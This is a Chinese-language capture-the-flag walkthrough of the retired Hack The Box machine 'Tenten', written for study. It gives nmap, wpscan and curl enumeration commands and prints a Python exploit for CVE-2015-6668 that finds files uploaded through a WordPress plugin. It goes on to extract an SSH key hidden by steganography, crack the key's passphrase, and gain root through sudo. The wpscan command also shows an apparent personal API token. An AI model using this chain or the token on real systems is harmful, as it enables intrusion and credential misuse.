本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.10
nmap -sC -sV -p- -T5 10.10.10.10 -oN tenten.nmap
nmap扫描结果
就开了两个端口,看下Web应用,发现是个wordpress 点击了几个页面,发现下面这个
点下那个Apply Now 到了如下页面
得到上面的url地址:http://10.10.10.10/index.php/jobs/apply/8/ 其中最末尾是个数字,可以先探测下,这里可以使用burpsuite,wfuzz进行探测,我为了方便显示就使用shell脚本循环进行探测显示
for i in $(seq 1 25); do echo -n "$i: "; curl -s http://10.10.10.10/index.php/jobs/apply/$i/ | grep 'entry-title' | cut -d'>' -f2 | cut -d'<' -f1; done
发现了一个标题信息为HackerAccessGranted,这是个重要的提示信息,先放着,我们使用wpscan扫描下目标并枚举下存在哪些用户,在使用之前需要先在https://wpscan.com/ 注册下免费的账户,然后使用官方免费的api来获取漏洞信息,不然wpscan扫描不了任何漏洞信息,我这里已经注册好了,下面是扫描结果
wpscan --url http://10.10.10.10 -e ap,t,tt,u --api-token pFokhQNG8ZFEmmntdfHfTYnrYdnvJHKtVtDuHTqTqBc
发现一个插件漏洞可以探测出敏感信息,编号是CVE-2015-6668这里可以使用下面的exploit
https://raw.githubusercontent.com/Johk3/HTB_Walkthrough/master/Tenten/disclosurevuln.py
https://raw.githubusercontent.com/Jack-Barradell/exploits/master/CVE-2015-6668/cve-2015-6668.py 这个没测试成功
import requests print """ CVE-2015-6668 Title: CV filename disclosure on Job-Manager WP Plugin Author: Evangelos Mourikis Blog: https://vagmour.eu Plugin URL: http://www.wp-jobmanager.com Versions: <=0.7.25 """ website = raw_input('Enter a vulnerable website: ') filename = raw_input('Enter a file name: ') filename2 = filename.replace(" ", "-") for year in range(2016,2018): for i in range(1,13): for extension in {'jpeg','txt','doc','pdf','docx'}: URL = website + "/wp-content/uploads/" + str(year) + "/" + "{:02}".format(i) + "/" + filename2 + "." + extension req = requests.get(URL) if req.status_code==200: print "[+] URL of CV found! " + URL
上面测试的结果:
根据上面信息最终得出了图片文件地址:http://10.10.10.10//wp-content/uploads/2017/04/HackerAccessGranted.jpg
同时上面wpscan扫描发现一个目标wordpress用户名,后面应该会用到,先放着
访问http://10.10.10.10//wp-content/uploads/2017/04/HackerAccessGranted.jpg 并下载下来
使用wget下载下来使用strings命令没查到有价值的信息,然后捣鼓了半天确认该图片使用了隐写术存放了隐藏文件,需要使用此命令 steghide 相关用法参考:https://blog.csdn.net/abc_12366/article/details/87098397
steghide extract -sf HackerAccessGranted.jpg
使用上面命令执行之后需要输入密码,尝试直接敲击回车使用空密码 登录上去了
此时生成了文件id_rsa 查看一下该文件
直接使用该文件进行ssh登录,用户就是上面wpscan扫描到的用户
需要输入密钥的密码,没法了,使用john进行暴力破解了,破解之前先使用ssh2john转换为john能识别的形式
python /usr/share/john/ssh2john.py id_rsa > bmfxcrack.txt
破解出来密钥的密码是superpassword ,那么再次远程ssh登录目标靶机
成功登录,执行了下sudo -l 可以提权的文件是fuckin ,看下该文件是什么类型的,发现就是bash脚本,然后看下里面的内容,加了shell的位置变量,这就好办了,直接提权